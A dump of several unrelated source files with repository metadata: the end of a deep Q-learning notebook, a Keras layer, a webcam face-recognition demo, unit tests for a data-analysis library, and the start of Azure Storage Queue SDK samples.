Episode: 707 Total reward: 99.0 Training loss: 0.1407 Explore P: 0.0185
Episode: 709 Total reward: 160.0 Training loss: 0.0913 Explore P: 0.0182
Episode: 712 Total reward: 99.0 Training loss: 0.1815 Explore P: 0.0178
Episode: 715 Total reward: 99.0 Training loss: 0.1191 Explore P: 0.0174
Episode: 718 Total reward: 99.0 Training loss: 0.1073 Explore P: 0.0170
Episode: 721 Total reward: 99.0 Training loss: 0.1133 Explore P: 0.0167
Episode: 724 Total reward: 99.0 Training loss: 0.0898 Explore P: 0.0164
Episode: 727 Total reward: 99.0 Training loss: 0.1217 Explore P: 0.0160
Episode: 730 Total reward: 99.0 Training loss: 0.2150 Explore P: 0.0158
Episode: 733 Total reward: 99.0 Training loss: 0.0678 Explore P: 0.0155
Episode: 736 Total reward: 99.0 Training loss: 0.0872 Explore P: 0.0152
Episode: 739 Total reward: 99.0 Training loss: 0.1330 Explore P: 0.0150
Episode: 742 Total reward: 99.0 Training loss: 0.1116 Explore P: 0.0147
Episode: 745 Total reward: 99.0 Training loss: 0.1611 Explore P: 0.0145
Episode: 748 Total reward: 99.0 Training loss: 0.1307 Explore P: 0.0143
Episode: 751 Total reward: 99.0 Training loss: 0.0875 Explore P: 0.0141
Episode: 754 Total reward: 99.0 Training loss: 0.1344 Explore P: 0.0139
Episode: 757 Total reward: 99.0 Training loss: 0.0911 Explore P: 0.0137
Episode: 760 Total reward: 99.0 Training loss: 0.1224 Explore P: 0.0135
Episode: 763 Total reward: 99.0 Training loss: 0.0572 Explore P: 0.0133
Episode: 766 Total reward: 99.0 Training loss: 0.0757 Explore P: 0.0132
Episode: 769 Total reward: 99.0 Training loss: 0.0381 Explore P: 0.0130
Episode: 772 Total reward: 99.0 Training loss: 0.1698 Explore P: 0.0129
Episode: 775 Total reward: 99.0 Training loss: 0.0365 Explore P: 0.0127
Episode: 778 Total reward: 99.0 Training loss: 0.1805 Explore P: 0.0126
Episode: 781 Total reward: 99.0 Training loss: 0.1017 Explore P: 0.0125
Episode: 784 Total reward: 99.0 Training loss: 0.1112 Explore P: 0.0123
Episode: 787 Total reward: 99.0 Training loss: 0.0930 Explore P: 0.0122
Episode: 790 Total reward: 99.0 Training loss: 0.0693 Explore P: 0.0121
Episode: 793 Total reward: 99.0 Training loss: 0.0431 Explore P: 0.0120
Episode: 796 Total reward: 99.0 Training loss: 0.1168 Explore P: 0.0119
Episode: 799 Total reward: 99.0 Training loss: 0.1071 Explore P: 0.0118
Episode: 802 Total reward: 99.0 Training loss: 0.1360 Explore P: 0.0117
Episode: 805 Total reward: 99.0 Training loss: 0.0872 Explore P: 0.0117
Episode: 808 Total reward: 99.0 Training loss: 0.1197 Explore P: 0.0116
Episode: 811 Total reward: 99.0 Training loss: 0.0848 Explore P: 0.0115
Episode: 814 Total reward: 99.0 Training loss: 0.0515 Explore P: 0.0114
Episode: 817 Total reward: 99.0 Training loss: 0.1590 Explore P: 0.0114
Episode: 820 Total reward: 99.0 Training loss: 0.2080 Explore P: 0.0113
Episode: 823 Total reward: 99.0 Training loss: 0.1532 Explore P: 0.0112
Episode: 826 Total reward: 99.0 Training loss: 0.0622 Explore P: 0.0112
Episode: 829 Total reward: 99.0 Training loss: 0.0553 Explore P: 0.0111
Episode: 832 Total reward: 99.0 Training loss: 0.0746 Explore P: 0.0111
Episode: 835 Total reward: 99.0 Training loss: 0.1045 Explore P: 0.0110
Episode: 838 Total reward: 99.0 Training loss: 0.0929 Explore P: 0.0110
Episode: 841 Total reward: 99.0 Training loss: 0.1053 Explore P: 0.0109
Episode: 844 Total reward: 99.0 Training loss: 0.0877 Explore P: 0.0109
Episode: 847 Total reward: 99.0 Training loss: 0.0783 Explore P: 0.0108
Episode: 850 Total reward: 99.0 Training loss: 0.0724 Explore P: 0.0108
Episode: 853 Total reward: 99.0 Training loss: 0.1745 Explore P: 0.0107
Episode: 856 Total reward: 99.0 Training loss: 0.0334 Explore P: 0.0107
Episode: 859 Total reward: 99.0 Training loss: 0.0205 Explore P: 0.0107
Episode: 862 Total reward: 99.0 Training loss: 0.0674 Explore P: 0.0106
Episode: 865 Total reward: 99.0 Training loss: 0.1149 Explore P: 0.0106
Episode: 868 Total reward: 99.0 Training loss: 191.0773 Explore P: 0.0106
Episode: 871 Total reward: 99.0 Training loss: 0.1013 Explore P: 0.0106
Episode: 873 Total reward: 156.0 Training loss: 0.2140 Explore P: 0.0105
Episode: 874 Total reward: 185.0 Training loss: 0.1837 Explore P: 0.0105
Episode: 876 Total reward: 45.0 Training loss: 0.1855 Explore P: 0.0105
Episode: 877 Total reward: 55.0 Training loss: 0.0789 Explore P: 0.0105
Episode: 880 Total reward: 99.0 Training loss: 0.0890 Explore P: 0.0105
Episode: 882 Total reward: 185.0 Training loss: 0.0788 Explore P: 0.0105
Episode: 885 Total reward: 99.0 Training loss: 0.1397 Explore P: 0.0104
Episode: 888 Total reward: 99.0 Training loss: 0.0400 Explore P: 0.0104
Episode: 891 Total reward: 99.0 Training loss: 0.0962 Explore P: 0.0104
Episode: 894 Total reward: 99.0 Training loss: 0.1356 Explore P: 0.0104
Episode: 897 Total reward: 99.0 Training loss: 0.2037 Explore P: 0.0104
Episode: 900 Total reward: 99.0 Training loss: 0.0486 Explore P: 0.0103
Episode: 903 Total reward: 99.0 Training loss: 0.2492 Explore P: 0.0103
Episode: 906 Total reward: 99.0 Training loss: 0.1467 Explore P: 0.0103
Episode: 909 Total reward: 99.0 Training loss: 0.2217 Explore P: 0.0103
Episode: 912 Total reward: 99.0 Training loss: 0.1772 Explore P: 0.0103
Episode: 915 Total reward: 99.0 Training loss: 0.0898 Explore P: 0.0103
Episode: 918 Total reward: 99.0 Training loss: 0.0552 Explore P: 0.0103
Episode: 921 Total reward: 99.0 Training loss: 0.1267 Explore P: 0.0102
Episode: 924 Total reward: 99.0 Training loss: 0.3037 Explore P: 0.0102
Episode: 927 Total reward: 99.0 Training loss: 0.1654 Explore P: 0.0102
Episode: 930 Total reward: 99.0 Training loss: 0.1975 Explore P: 0.0102
Episode: 933 Total reward: 99.0 Training loss: 0.2122 Explore P: 0.0102
Episode: 936 Total reward: 99.0 Training loss: 0.0754 Explore P: 0.0102
Episode: 939 Total reward: 99.0 Training loss: 0.1481 Explore P: 0.0102
Episode: 942 Total reward: 99.0 Training loss: 0.0895 Explore P: 0.0102
Episode: 945 Total reward: 99.0 Training loss: 0.0690 Explore P: 0.0102
Episode: 948 Total reward: 99.0 Training loss: 0.0942 Explore P: 0.0102
Episode: 951 Total reward: 99.0 Training loss: 0.0567 Explore P: 0.0101
Episode: 954 Total reward: 99.0 Training loss: 0.0665 Explore P: 0.0101
Episode: 957 Total reward: 99.0 Training loss: 0.0645 Explore P: 0.0101
Episode: 960 Total reward: 99.0 Training loss: 224.4461 Explore P: 0.0101
Episode: 963 Total reward: 99.0 Training loss: 0.0508 Explore P: 0.0101
Episode: 966 Total reward: 99.0 Training loss: 0.0792 Explore P: 0.0101
Episode: 969 Total reward: 99.0 Training loss: 0.0754 Explore P: 0.0101
Episode: 972 Total reward: 99.0 Training loss: 0.0655 Explore P: 0.0101
Episode: 975 Total reward: 99.0 Training loss: 0.0686 Explore P: 0.0101
Episode: 978 Total reward: 99.0 Training loss: 0.0361 Explore P: 0.0101
Episode: 981 Total reward: 99.0 Training loss: 0.1777 Explore P: 0.0101
Episode: 984 Total reward: 99.0 Training loss: 0.0633 Explore P: 0.0101
Episode: 987 Total reward: 99.0 Training loss: 0.0559 Explore P: 0.0101
Episode: 990 Total reward: 99.0 Training loss: 0.0543 Explore P: 0.0101
Episode: 993 Total reward: 99.0 Training loss: 0.0833 Explore P: 0.0101
Episode: 996 Total reward: 99.0 Training loss: 0.1037 Explore P: 0.0101
Episode: 997 Total reward: 45.0 Training loss: 0.0619 Explore P: 0.0101
# ## Visualizing training
#
# Below we plot the total rewards for each episode. The rolling average is plotted in blue.
# In[ ]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
def running_mean(x, N):
    # N-point moving average computed via cumulative sums:
    # (cumsum[i + N] - cumsum[i]) / N is the mean of x[i:i + N]
    cumsum = np.cumsum(np.insert(x, 0, 0))
    return (cumsum[N:] - cumsum[:-N]) / N
# In[ ]:
eps, rews = np.array(rewards_list).T
smoothed_rews = running_mean(rews, 10)
plt.plot(eps[-len(smoothed_rews):], smoothed_rews)
plt.plot(eps, rews, color='grey', alpha=0.3)
plt.xlabel('Episode')
plt.ylabel('Total Reward')
# In[ ]:
Text(0,0.5,'Total Reward')
# 
#
#
# ## Playing Atari Games
#
# So, Cart-Pole is a pretty simple game. However, the same model can be used to train an agent to play something much more complicated, like Pong or Space Invaders. Instead of the low-dimensional state vector we're using here, you'd want convolutional layers that extract the state directly from the screen images.
#
# 
#
# I'll leave it as a challenge for you to use deep Q-learning to train an agent to play Atari games. Here's the original paper which will get you started: http://www.davidqiu.com:8888/research/nature14236.pdf.
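#
# As a rough illustration (an assumption following common DQN setups, not code
# from this notebook or the paper), the fully-connected state layers could be
# swapped for a convolutional front end over stacked grayscale frames. The
# 84x84x4 input shape and the layer sizes below are conventional choices.

# In[ ]:

import tensorflow as tf

def build_atari_q_network(num_actions, frame_shape=(84, 84, 4)):
    """Sketch of a convolutional Q-network for raw-pixel states (illustrative)."""
    model = tf.keras.Sequential([
        # Convolutional trunk extracts spatial features from the screen images
        tf.keras.layers.Conv2D(32, 8, strides=4, activation='relu',
                               input_shape=frame_shape),
        tf.keras.layers.Conv2D(64, 4, strides=2, activation='relu'),
        tf.keras.layers.Conv2D(64, 3, strides=1, activation='relu'),
        tf.keras.layers.Flatten(),
        tf.keras.layers.Dense(512, activation='relu'),
        # Linear output head: one Q-value per discrete action
        tf.keras.layers.Dense(num_actions)
    ])
    return model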
| 61.176951 | 408 | 0.725766 |
9b57ca29b73179c1cb29363de366b8f4d93c6230 | 2,684 | py | Python | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 45 | 2020-02-23T22:01:13.000Z | 2021-09-10T19:24:40.000Z | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 16 | 2020-03-12T06:12:44.000Z | 2022-01-19T19:44:33.000Z | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 9 | 2020-02-24T13:06:16.000Z | 2021-11-09T22:59:32.000Z | from typing import Optional
from typing import Tuple
import tensorflow as tf
from tensorflow import keras
class SpatialToRegions(keras.layers.Layer):
"""
Reshapes spatial SPN layer to a dense layer.
The dense output has leading dimensions for scopes and decomps (which will be ``[1, 1]``).
"""
def build(self, input_shape: Tuple[Optional[int], ...]) -> None:
"""
Build the internal components for this layer.
Args:
input_shape: Shape of the input Tensor.
Raises:
ValueError: If dimensions are unknown.
"""
_, num_cells_vertical, num_cells_horizontal, num_nodes = input_shape
if num_cells_horizontal is None:
raise ValueError(
"Cannot compute shape with unknown number of horizontal cells"
)
if num_cells_vertical is None:
raise ValueError(
"Cannot compute shape with unknown number of vertical cells"
)
if num_nodes is None:
raise ValueError("Cannot compute shape with unknown number of nodes")
self._out_num_nodes = num_cells_vertical * num_cells_horizontal * num_nodes
def call(self, x: tf.Tensor, **kwargs) -> tf.Tensor:
"""
Compute region representation from spatial tensor.
Assumes that all nodes have the same scope along the spatial axes.
Args:
x: Spatial input.
kwargs: Remaining keyword arguments.
Returns:
A region representation of the input.
"""
shape = tf.shape(x)
return tf.reshape(x, [shape[0], 1, 1, self._out_num_nodes])
def compute_output_shape(
self, input_shape: Tuple[Optional[int], ...]
) -> Tuple[Optional[int], ...]:
"""
Compute output shape of the layer.
Args:
input_shape: Input shape of the layer.
Returns:
Tuple of ints holding the output shape of the layer.
Raises:
ValueError: When shape cannot be computed.
"""
num_batch, num_cells_vertical, num_cells_horizontal, num_nodes = input_shape
if num_cells_horizontal is None:
raise ValueError(
"Cannot compute shape with unknown number of horizontal cells"
)
if num_cells_vertical is None:
raise ValueError(
"Cannot compute shape with unknown number of vertical cells"
)
if num_nodes is None:
raise ValueError("Cannot compute shape with unknown number of nodes")
return num_batch, 1, 1, num_cells_vertical * num_cells_horizontal * num_nodes
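# Illustrative usage sketch (my assumption; the shapes are examples, not taken
# from the library docs): all spatial cells collapse into a single region axis.
#
#   layer = SpatialToRegions()
#   spatial = tf.random.uniform([32, 4, 4, 8])  # [batch, rows, cols, nodes]
#   regions = layer(spatial)                    # shape: [32, 1, 1, 4 * 4 * 8]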
| 33.135802 | 94 | 0.616617 |
eb02b7a5acfe49973df065f6e07d325d5c394c40 | 4,608 | py | Python | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | import face_recognition
import cv2
import os
import time
import imutils
from imutils.video import VideoStream
from imutils.video import FPS
# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the
# other example, but it includes some basic performance tweaks to make things run a lot faster:
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.
# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this
# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.
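# A minimal sketch of tweak #1 (illustration only; in the loop below the resize
# call is commented out, so this demo actually processes full-size frames):
#
#   small = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
#   locations = face_recognition.face_locations(small[:, :, ::-1])
#   # face_locations returns (top, right, bottom, left); scale back up by 4
#   full_size = [(t * 4, r * 4, b * 4, l * 4) for (t, r, b, l) in locations]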
known_face_encodings = []
known_face_names = []
def load_face_encoding(name, file_name):
image = face_recognition.load_image_file(file_name)
face_encoding = face_recognition.face_encodings(image)
if len(face_encoding) > 0:
known_face_encodings.append(face_encoding[0])
known_face_names.append(name)
print("Image loaded: {}".format(name))
else:
print("Unable load image: {}".format(name))
# Get a reference to webcam #0 (the default one)
#video_capture = cv2.VideoCapture(0)
#video_capture = VideoStream(src=0).start()
# use Raspbi cam
video_capture = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
print("Loading images from {}".format(os.path.dirname(os.path.abspath(__file__))+"/bilder/"))
load_face_encoding("Stefan", os.path.dirname(os.path.abspath(__file__))+"/../bilder/beffy.jpg")
load_face_encoding("Erik", os.path.dirname(os.path.abspath(__file__))+"/../bilder/erik.jpg")
load_face_encoding("Mika", os.path.dirname(os.path.abspath(__file__))+"/../bilder/mika.jpg")
load_face_encoding("Sonja", os.path.dirname(os.path.abspath(__file__))+"/../bilder/sonja.jpg")
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
frame = video_capture.read()
    # Resizing the frame to 1/4 size would speed up face recognition, but the
    # resize calls are commented out below, so detection runs on the full frame
    #small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
    #small_frame = imutils.resize(frame, width=500)
    (h, w) = frame.shape[:2]
    smallW = int(round(w * 0.25))  # quarter width, currently unused
    #print("Width {}!".format(smallW))
    small_frame = frame  #imutils.resize(frame, smallW)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
# default tolerance is 0.6, the lesser the stricter
tolerance = 0.5
matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance)
name = "Unknown"
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
print("Hello, {}".format(name))
process_this_frame = not process_this_frame
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
        # If detection had run on a 1/4-size frame, the locations would need to
        # be scaled back up by 4; resizing is disabled above, so this stays commented
#top *= 4
#right *= 4
#bottom *= 4
#left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# Display the resulting image
cv2.imshow('Video', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Stop the webcam video stream (imutils' VideoStream uses stop(), not release())
video_capture.stop()
cv2.destroyAllWindows()
| 40.069565 | 116 | 0.687066 |
8d7c237baa56a71961f7c17a8cca6654aa135362 | 12,694 | py | Python | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | # the inclusion of the tests module is not meant to offer best practices for
# testing in general, but rather to support the `find_packages` example in
# setup.py that excludes installing the "tests" package
import unittest
import pandas as pd
import hashlib #should just be needed in testing to see if the contents of a generated file are correct
import koleksyon.lib as ll
import koleksyon.dta as dd
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
#algorithms
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestRegressor
#testing datasets
from sklearn.datasets import load_breast_cancer
def check_contents(md5, filepath, ignore):
"""
md5 - the md5 sum calculated last time the data was validated as correct
filepath - the location/file where the new data is, this is to be validated
ignore - a list of regular expressions that should be thrown out, line by line in the comparison
"""
# Open,close, read file and calculate MD5 on its contents
with open(filepath,"r",encoding='utf-8') as file_to_check:
# read contents of the file
data = ""
lines = file_to_check.readlines()
for line in lines:
flag = True
            for pattern in ignore:
                if pattern in line:
                    flag = False  # exclude this line (e.g. a date) so it doesn't break the md5 comparison
if flag:
data = data + line + "\n"
#print(data)
# pipe contents of the file through
md5_returned = hashlib.md5(data.encode('utf-8')).hexdigest()
print("Checking Contents Via Hash:")
print("Original: " + md5)
print("Calculated: " + md5_returned)
if md5 == md5_returned:
return True #md5 verified
else:
return False #md5 verification failed!
class TestLib(unittest.TestCase):
def test_find_mode_mode(self):
print("Testing Mode Mode...")
a = [1,1,2,2,3,3]
mm = ll.find_mode_mode(a)
self.assertEqual(mm, 2)
b = [1,2,3,3]
self.assertEqual(ll.find_mode_mode(b), 3)
c = [1,2,2,3,3]
self.assertEqual(ll.find_mode_mode(c), 2)
d = [1,1,2,3,3]
self.assertEqual(ll.find_mode_mode(d), 1)
e = [1,1,2,2,2,3,3]
self.assertEqual(ll.find_mode_mode(e), 2)
def test_dist_report(self):
print("Testing Distribution Report...")
df = pd.read_csv("../data/cars.csv")
report = ll.dist_report(df, 'MSRP')
#print(report) #pretty!
rt = str(report).split("\n")
#print(rt)
expected = [
"Statistics for Variable: MSRP",
"Number of Data Points: 11914",
"Min: 2000",
"Max: 2065902",
"Mean: 40594.737032063116",
"Mode: 2000",
"Variance: 60106.5809259237",
"Excess kurtosis of normal distribution (should be 0): 60106.5809259237",
"Skewness of normal distribution (should be 0): 11.770504957244958",
""
]
self.assertEqual(len(expected), len(rt))
i = 0
for i in range(0, len(expected)):
self.assertEqual(expected[i], rt[i])
def test_density_plot(self):
print("Testing Density Plot...")
# Correct original md5
original_md5 = '07e1b5ecbc2f03eb8a1e7dc3b586a751'
df = pd.read_csv("../data/cars.csv")
x = df['MSRP']
pltFile = ll.density_plot(x)
print(pltFile)
#check that the rendering is the same as what we expect for this data/variable
self.assertTrue(check_contents(original_md5, pltFile, ["<dc:date>", "style=", "path clip-path=", "clipPath id=", "xlink:href"]))
#TODO: this function needs to be redone! especially in light of the new encode library...
# def test_data_prep(self):
# print("Testing data_prep:")
# df = dd.load_parquet("../data/melbourne/", "melbourne_")
# #first, don't do anything to the data... should have same number of rows as original...
# X_train, X_test, y_train, y_test = ll.data_prep(df, 'Price', missing_strategy='none', test_size=1.0)
# self.assertEqual(len(df), len(X_test))
# self.assertEqual(len(df), len(y_test))
# X_train, X_test, y_train, y_test = ll.data_prep(df, 'Price', missing_strategy='droprow', test_size=1.0)
# #notice how this removes rows...
# self.assertEqual(1778, len(X_test))
# self.assertEqual(1778, len(y_test))
#def test_var_analysis(self):
# df = pd.read_csv("../data/cars.csv")
# print(df)
# ll.var_analysis(df, "MSRP")
######################################################################
#
# Accuracy Statistics Below...
# note the goal of AccuracyStats is not to replace sklearn,
# just to make sure people remember to calculate a variety of different summary statistics when they evaluate models!
# below we test:
# * classifier
# * regressor
#
######################################################################
#test based on: https://towardsdatascience.com/a-practical-guide-to-seven-essential-performance-metrics-for-classification-using-scikit-learn-2de0e0a8a040
def test_AccuracyStats_classifier(self):
print("Testing Accuracy Statistics on a Simple Classifier...")
#STEP 1: prep data
br_cancer = load_breast_cancer()
#note we could leverage the data prep functions in koleksyon to make this easier, but this is simpler for a test...
X, y = br_cancer['data'], br_cancer['target']
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.3, random_state=42)
#create various different algorithms to test the performance statistics on them
knn_model = KNeighborsClassifier(n_neighbors=3)
knn_model.fit(X_train, y_train)
sgd_model = SGDClassifier(random_state=42)
sgd_model.fit(X_train, y_train)
log_model = LogisticRegression()
log_model.fit(X_train, y_train)
#create predictions...
y_pred_knn = knn_model.predict(X_test)
y_pred_sgd = sgd_model.predict(X_test)
y_pred_log = log_model.predict(X_test)
#calculate some statistics, one for each algorithm (usually, we don't have multiple algorithms, we have multiple runs)
astats_knn = ll.AccuracyStats('classifier')
stats_knn = astats_knn.calculate_stats(y_test, y_pred_knn)
astats_sgd = ll.AccuracyStats('classifier')
stats_sgd = astats_sgd.calculate_stats(y_test, y_pred_sgd)
astats_log = ll.AccuracyStats('classifier')
stats_log = astats_log.calculate_stats(y_test, y_pred_log)
#first check that we can get a string output from the stats calculations (check the individual values of the computations in next section)
#this is a handy way to just print the stats in the object...
knn_str = str(astats_knn)
print(knn_str)
self.assertGreater(len(knn_str), 1)
sgd_str = str(stats_sgd)
print(sgd_str)
self.assertGreater(len(sgd_str), 1)
log_str = str(astats_log)
print(log_str)
self.assertGreater(len(log_str), 1)
#check the accuracy statistics are correct
self.assertAlmostEqual(0.9590643274853801, stats_knn['accuracy_score']) #or astats_knn.accuracy_score, both work
self.assertAlmostEqual(0.9649122807017544, stats_sgd['accuracy_score'])
self.assertAlmostEqual(0.9824561403508771, stats_log['accuracy_score'])
#check the confusion matrix (TP/FP/TN/FN) is correct
# TP=59 | FP=4
# FN=3 | TN=105
self.assertEqual(59, astats_knn.true_positives) #or stats_knn['true_positives'], both work
self.assertEqual(4, astats_knn.false_positives)
self.assertEqual(3, astats_knn.false_negatives)
self.assertEqual(105, astats_knn.true_negatives)
# TP=61 | FP=2
# FN=4 | TN=104
self.assertEqual(61, astats_sgd.true_positives)
self.assertEqual(2, astats_sgd.false_positives)
self.assertEqual(4, astats_sgd.false_negatives)
self.assertEqual(104, astats_sgd.true_negatives)
# TP=62 | FP=1
# FN=2 | TN=106
self.assertEqual(62, astats_log.true_positives)
self.assertEqual(1, astats_log.false_positives)
self.assertEqual(2, astats_log.false_negatives)
self.assertEqual(106, astats_log.true_negatives)
#check the F1 statistics are correct
self.assertAlmostEqual(0.9558709677419355, stats_knn['f1_score']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.962543808411215, stats_sgd['f1_score'])
self.assertAlmostEqual(0.9812122321919062, stats_log['f1_score'])
#check the precision statistics are correct
self.assertAlmostEqual(0.9365079365079365, stats_knn['precision']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9682539682539683, stats_sgd['precision'])
self.assertAlmostEqual(0.9841269841269841, stats_log['precision'])
#check the recall statistics are correct
self.assertAlmostEqual(0.9516129032258065, stats_knn['recall']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9384615384615385, stats_sgd['recall'])
self.assertAlmostEqual(0.96875, stats_log['recall'])
#check area under the curve (auc)
self.assertAlmostEqual(0.9543650793650794, stats_knn['roc_auc']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9656084656084655, stats_sgd['roc_auc'])
self.assertAlmostEqual(0.9828042328042328, stats_log['roc_auc'])
def test_AccuracyStats_regressor(self):
print("Testing Accuracy Statistics on a Simple Regressor...")
#pd.set_option('display.max_columns', None)
df = pd.read_csv("../data/imports85.csv")
# Prep the Data
#
#don't want to deal with the empty data nonsense
df = df.fillna(-1)
df = df.replace('?', -1)
print(df)
#the data is all catigorical, so we need to use some sort of encoder, a one-hot encoder is simple and makes the test clear, so we use that
        #here we just use pandas... there are easier ways to encode stuff in the category encoders package (look in encode.py in this package!)
        #-- we just don't want a circular dependency (don't use this in production, it's also slow!)
columns = ['make','fuel-type','aspiration','num-of-doors','body-style','drive-wheels','engine-location', 'engine-type', 'num-of-cylinders', 'fuel-system'] #
i = 1
for col in columns:
one_hot = pd.get_dummies(df[col], prefix=str(i))
#drop the encoded stuff as it is now redundant
df = df.drop([col],axis = 1)
# join the dataframes
df = df.join(one_hot)
i = i + 1
print(df)
y = df['price']
X = df.drop(['price'], axis=1)
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.3, random_state=42)
#build a simple algorithm, create predition
rf = RandomForestRegressor(n_estimators = 1000, random_state = 42)
rf.fit(X_train, y_train)
y_pred = rf.predict(X_test)
# calculate statistics -- the thing we are actually testing XooX!
#
rfstats = ll.AccuracyStats('regressor')
stats = rfstats.calculate_stats(y_test, y_pred)
print("Checking AccuracyStats for regression...")
print(stats)
#{'mean_squared_error': 12344135.436750872, 'mean_absolute_error': 1893.6762903225806, 'sqrt_mean_squared_error': 3513.422183107358, 'r2_score': 0.8329095430495994}
self.assertGreater(len(str(stats)), 1) #we have statistics in the generated string
self.assertAlmostEqual(12344135.436750872, rfstats.mean_squared_error) #or stats['mean_squared_error'] and so on for the next 3 tests
self.assertAlmostEqual(1893.6762903225806, rfstats.mean_absolute_error)
self.assertAlmostEqual(3513.422183107358, rfstats.sqrt_mean_squared_error)
self.assertAlmostEqual(0.8329095430495994, rfstats.r2_score)
if __name__ == '__main__':
unittest.main()
| 45.335714 | 172 | 0.650544 |
f5c72c54a120771f77a4012c5850c64376b2d21c | 9,453 | py | Python | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: queue_samples_message.py
DESCRIPTION:
These samples demonstrate the following: creating and setting an access policy to generate a
sas token, getting a queue client from a queue URL, setting and getting queue
metadata, sending messages and receiving them individually or by batch, deleting and
clearing all messages, and peeking and updating messages.
USAGE:
python queue_samples_message.py
Set the environment variables with your own values before running the sample:
1) AZURE_STORAGE_CONNECTION_STRING - the connection string to your storage account
"""
from datetime import datetime, timedelta
import os
class QueueMessageSamples(object):
connection_string = os.getenv("AZURE_STORAGE_CONNECTION_STRING")
def set_access_policy(self):
# [START create_queue_client_from_connection_string]
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue1")
# [END create_queue_client_from_connection_string]
# Create the queue
queue.create_queue()
# Send a message
queue.send_message(u"hello world")
try:
# [START set_access_policy]
# Create an access policy
from azure.storage.queue import AccessPolicy, QueueSasPermissions
access_policy = AccessPolicy()
access_policy.start = datetime.utcnow() - timedelta(hours=1)
access_policy.expiry = datetime.utcnow() + timedelta(hours=1)
access_policy.permission = QueueSasPermissions(read=True)
identifiers = {'my-access-policy-id': access_policy}
# Set the access policy
queue.set_queue_access_policy(identifiers)
# [END set_access_policy]
# Use the access policy to generate a SAS token
# [START queue_client_sas_token]
from azure.storage.queue import generate_queue_sas
sas_token = generate_queue_sas(
queue.account_name,
queue.queue_name,
queue.credential.account_key,
policy_id='my-access-policy-id'
)
# [END queue_client_sas_token]
# Authenticate with the sas token
# [START create_queue_client]
token_auth_queue = QueueClient.from_queue_url(
queue_url=queue.url,
credential=sas_token
)
# [END create_queue_client]
# Use the newly authenticated client to receive messages
my_message = token_auth_queue.receive_messages()
finally:
# Delete the queue
queue.delete_queue()
def queue_metadata(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
